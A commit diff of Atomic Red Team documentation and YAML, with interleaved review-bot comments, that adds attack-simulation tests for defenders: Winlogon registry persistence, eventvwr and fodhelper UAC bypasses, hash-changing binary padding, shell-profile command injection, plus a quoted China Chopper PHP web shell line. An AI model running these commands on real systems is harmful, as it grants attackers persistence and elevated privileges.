Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-12-13 16:06:36 +00:00
parent 0f576dd03f
commit 07079c9ed7
11 changed files with 502 additions and 78 deletions
+76
View File
@@ -0,0 +1,76 @@
# T1004 - Winlogon Helper DLL
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
<blockquote>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell)
- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell)
- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
<br/>
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
#### Run it with `powershell`!
```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
<br/>
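Review bot: none of the three T1004 tests has a cleanup step, so a run leaves the HKCU Winlogon `Shell`, `Userinit` and `Notify\logon` values pointing at the test binary for every later logon of that account; add a cleanup command per test (for example `Remove-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell"`) or document the manual revert. Test #3 also defaults `binary_to_execute` to `C:\Windows\Temp\atomicNotificationPackage.dll`, which nothing in the test creates or ships, so that prerequisite should be stated in the description rather than left implicit.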
+11 -8
View File
@@ -4,23 +4,26 @@
## Atomic Tests
- [Atomic Test #1 - Pad Evil Binary to Change Hash](#atomic-test-1---pad-evil-binary-to-change-hash)
- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
<br/>
## Atomic Test #1 - Pad Evil Binary to Change Hash
Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
Uses dd to add a zero to the binary to change the hash
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_pad | Path of binary to be padded | Path | /tmp/EvilBinary|
#### Run it with `sh`!
```
cp /bin/cat /tmp/evilCat
md5sum /tmp/evilCat
dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
md5sum /tmp/evilCat
/tmp/evilCat .bash_profile
md5sum #{binary_to_pad}
dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad}
md5sum #{binary_to_pad}
```
<br/>
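Review bot: with the default `binary_to_pad` of `/tmp/EvilBinary`, the new command sequence no longer creates the file it pads (the removed lines first did `cp /bin/cat /tmp/evilCat`), so the first `md5sum` fails with "No such file" and `dd ... >>` creates a one-byte file instead of padding a binary; either restore a setup step or state in the description that the caller must point the argument at an existing binary. The test is also labelled Linux/macOS, but stock macOS ships `md5`, not `md5sum`, so the hash lines fail there unless coreutils is installed; an `md5 -q` fallback or a note on the platform difference would help.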
+67
View File
@@ -14,6 +14,12 @@ Another bypass is possible through some Lateral Movement techniques if credentia
- [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer)
- [Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell](#atomic-test-2---bypass-uac-using-event-viewer---powershell)
- [Atomic Test #3 - Bypass UAC using Fodhelper](#atomic-test-3---bypass-uac-using-fodhelper)
- [Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell](#atomic-test-4---bypass-uac-using-fodhelper---powershell)
<br/>
@@ -34,3 +40,64 @@ reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executabl
cmd.exe -c eventvwr.msc
```
<br/>
<br/>
## Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
<br/>
<br/>
## Atomic Test #3 - Bypass UAC using Fodhelper
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
<br/>
<br/>
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
```
<br/>
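Review bot: Atomic Test #2 is a PowerShell test (`New-Item`, `Set-ItemProperty`, `Start-Process`), but its heading says `Run it with \`command_prompt\`!`, so an automated executor would hand those cmdlets to cmd.exe and fail; the executor should be `powershell`, as it is for Test #4. Separately, none of the four tests removes the `HKCU\software\classes\mscfile\shell\open\command` or `ms-settings\shell\open\command` keys it creates, which leaves the hijacked handler in place after the test finishes; add a cleanup step per test.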
+25 -6
View File
@@ -8,13 +8,15 @@ These files are meant to be written to by the local user to configure their own
## Atomic Tests
- [Atomic Test #1 - .bash_profile and .bashrc](#atomic-test-1---bash_profile-and-bashrc)
- [Atomic Test #1 - Add command to .bash_profile](#atomic-test-1---add-command-to-bash_profile)
- [Atomic Test #2 - Add command to .bashrc](#atomic-test-2---add-command-to-bashrc)
<br/>
## Atomic Test #1 - .bash_profile and .bashrc
xxx
## Atomic Test #1 - Add command to .bash_profile
Adds a command to the .bash_profile file of the current user
**Supported Platforms:** macOS, Linux
@@ -22,11 +24,28 @@ xxx
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | path to script | path | /path/to/script.py|
| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
#### Run it with `sh`!
```
echo "#{script}" >> ~/.bash_profile
echo "#{script}" >> ~/.bashrc
echo "#{command_to_add}" >> ~/.bash_profile
```
<br/>
<br/>
## Atomic Test #2 - Add command to .bashrc
Adds a command to the .bashrc file of the current user
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
#### Run it with `sh`!
```
echo "#{command_to_add}" >> ~/.bashrc
```
<br/>
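Review bot: `command_to_add` is typed `string`, but its default is still the old `script` argument's `/path/to/script.py`, so running either test with defaults appends a path to a script that does not exist and every subsequent login shell prints an error until the line is removed; the default should be a harmless self-contained command (an `echo`, for instance). Both tests also need a cleanup step that strips the appended line, since `>>` leaves it in the profile indefinitely.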
+13 -3
View File
@@ -1,7 +1,8 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1015 Accessibility Features](./T1015/T1015.md)
- Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
- Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
@@ -126,7 +127,10 @@
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# defense-evasion
- [T1134 Access Token Manipulation](./T1134/T1134.md)
@@ -136,9 +140,12 @@
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -330,6 +337,9 @@
- Atomic Test #1: Application Shim Installation [windows]
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+292 -54
View File
@@ -46,23 +46,40 @@ persistence:
created: '2017-12-14T16:46:06.044Z'
identifier: T1156
atomic_tests:
- name: ".bash_profile and .bashrc"
description: 'xxx
- name: Add command to .bash_profile
description: 'Adds a command to the .bash_profile file of the current user
'
supported_platforms:
- macos
- linux
input_arguments:
script:
description: path to script
type: path
command_to_add:
description: Command to add to the .bash_profile file
type: string
default: "/path/to/script.py"
executor:
name: sh
command: |
echo "#{script}" >> ~/.bash_profile
echo "#{script}" >> ~/.bashrc
command: 'echo "#{command_to_add}" >> ~/.bash_profile
'
- name: Add command to .bashrc
description: 'Adds a command to the .bashrc file of the current user
'
supported_platforms:
- macos
- linux
input_arguments:
command_to_add:
description: Command to add to the .bashrc file
type: string
default: "/path/to/script.py"
executor:
name: sh
command: 'echo "#{command_to_add}" >> ~/.bashrc
'
T1015:
technique:
id: attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3
@@ -347,63 +364,58 @@ persistence:
}
'':
technique:
id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79
id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Winlogon Helper DLL
description: "Winlogon.exe is a Windows component responsible for actions at
logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Registry entries in <code>HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper
programs and functionalities that support Winlogon. (Citation: Cylance Reg
Persistence Sept 2013) \n\nMalicious modifications to these Registry keys
may cause Winlogon to load and execute malicious DLLs and/or executables.
Specifically, the following subkeys have been known to be possibly vulnerable
to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify
- points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit
- points to userinit.exe, the user initialization program executed when a
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish Persistence."
name: Web Shell
description: |-
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
external_references:
- external_id: T1004
url: https://attack.mitre.org/techniques/T1004
- external_id: T1100
url: https://attack.mitre.org/techniques/T1100
source_name: mitre-attack
- external_id: CAPEC-579
url: https://capec.mitre.org/data/definitions/579.html
source_name: capec
- url: https://technet.microsoft.com/en-us/sysinternals/bb963902
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
source_name: Cylance Reg Persistence Sept 2013
- url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
source_name: Lee 2013
- url: https://www.us-cert.gov/ncas/alerts/TA15-314A
description: US-CERT. (2015, November 13). Compromised Web Servers and Web
Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
source_name: US-CERT Alert TA15-314A Web Shells
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_contributors:
- Praetorian
x_mitre_data_sources:
- Windows Registry
- Anti-virus
- Authentication logs
- File monitoring
- Netflow/Enclave netflow
- Process monitoring
x_mitre_detection: |-
Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
x_mitre_permissions_required:
- Administrator
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_effective_permissions:
- SYSTEM
- User
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_system_requirements:
- Adversary access to Web server with vulnerability or account to upload and
serve the Web shell file.
type: attack-pattern
kill_chain_phases:
- phase_name: persistence
kill_chain_name: mitre-attack
- phase_name: privilege-escalation
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:30:20.148Z'
created: '2017-05-31T21:31:13.061Z'
atomic_tests: []
T1103:
technique:
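Review bot: the Web Shell technique (its `external_id` is T1100) is being emitted under an empty-string key `'':` rather than `T1100:`, and unlike the T1156 and T1004 entries it has no `identifier:` field, so the generator's technique-id lookup evidently failed for this technique; the downstream index still shows Web Shell as CONTRIBUTE A TEST, consistent with `atomic_tests: []`, but an empty key will collide with any other technique that fails the same lookup and should be fixed in the generator rather than shipped. The hunk also drops the old Winlogon Helper DLL fields from this slot while T1004 gains its own entry later in the file, so it is worth confirming the rendered YAML has exactly one `name:`, one `created:` and one `external_references:` under this key.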
@@ -3565,6 +3577,120 @@ persistence:
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
T1004:
technique:
id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Winlogon Helper DLL
description: "Winlogon.exe is a Windows component responsible for actions at
logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Registry entries in <code>HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper
programs and functionalities that support Winlogon. (Citation: Cylance Reg
Persistence Sept 2013) \n\nMalicious modifications to these Registry keys
may cause Winlogon to load and execute malicious DLLs and/or executables.
Specifically, the following subkeys have been known to be possibly vulnerable
to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify
- points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit
- points to userinit.exe, the user initialization program executed when a
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish Persistence."
external_references:
- external_id: T1004
url: https://attack.mitre.org/techniques/T1004
source_name: mitre-attack
- external_id: CAPEC-579
url: https://capec.mitre.org/data/definitions/579.html
source_name: capec
- url: https://technet.microsoft.com/en-us/sysinternals/bb963902
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
source_name: Cylance Reg Persistence Sept 2013
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_contributors:
- Praetorian
x_mitre_data_sources:
- Windows Registry
- File monitoring
- Process monitoring
x_mitre_detection: |-
Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
x_mitre_permissions_required:
- Administrator
- SYSTEM
x_mitre_platforms:
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: persistence
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:30:20.148Z'
identifier: T1004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
description: 'PowerShell code to set Winlogon shell key to execute a binary
at logon along with explorer.exe.
'
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
'
- name: Winlogon Userinit Key Persistence - PowerShell
description: 'PowerShell code to set Winlogon userinit key to execute a binary
at logon along with userinit.exe.
'
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
'
- name: Winlogon Notify Key Logon Persistence - PowerShell
description: 'PowerShell code to set Winlogon Notify key to execute a notification
package DLL at logon.
'
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of notification package to execute
type: Path
default: C:\Windows\Temp\atomicNotificationPackage.dll
executor:
name: powershell
command: |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
defense-evasion:
T1134:
technique:
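Review bot: `binary_to_execute` is declared with `type: Path` (capital P) in all three T1004 tests, while the T1088 and T1156 arguments in this same file use `path` and `string`; if the validator is case-sensitive on input types this entry will be rejected, and if it is not, the generated input tables show mixed casing. Lower-case it for consistency with the rest of the file.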
@@ -3914,22 +4040,24 @@ defense-evasion:
created: '2017-05-31T21:30:22.096Z'
identifier: T1009
atomic_tests:
- name: Pad Evil Binary to Change Hash
description: 'Copies cat to create an "evil binary" and pads it with a zero
to change the hash without harming execution
- name: Pad Binary to Change Hash - Linux/macOS dd
description: 'Uses dd to add a zero to the binary to change the hash
'
supported_platforms:
- macos
- linux
input_arguments:
binary_to_pad:
description: Path of binary to be padded
type: Path
default: "/tmp/EvilBinary"
executor:
name: sh
command: |
cp /bin/cat /tmp/evilCat
md5sum /tmp/evilCat
dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
md5sum /tmp/evilCat
/tmp/evilCat .bash_profile
md5sum #{binary_to_pad}
dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad}
md5sum #{binary_to_pad}
T1088:
technique:
id: attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be
@@ -4044,6 +4172,61 @@ defense-evasion:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
T1191:
technique:
id: attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3
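Review bot: in the Fodhelper `command_prompt` test, `reg.exe add ... /v "DelegateExecute"` has neither `/f` nor `/d`; the first run creates an empty value, but on any re-run `reg.exe` prompts "Value DelegateExecute exists, overwrite (Yes/No)?" and a non-interactive executor hangs on the prompt. Add `/f` (and `/d ""` to make the intended empty REG_SZ explicit), matching the `/f` already used on the preceding `reg.exe add` line. In the same region, the "Bypass UAC using Event Viewer - PowerShell" test carries `name: command_prompt` under `executor:` although its `command:` is PowerShell, so it should be `name: powershell` like the Fodhelper PowerShell test below it. The same two corrections apply to the copy of these tests under privilege-escalation.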
@@ -9361,6 +9544,61 @@ privilege-escalation:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
T1179:
technique:
id: attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5
+3 -2
View File
@@ -1,7 +1,8 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1067 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -130,7 +131,7 @@
# defense-evasion
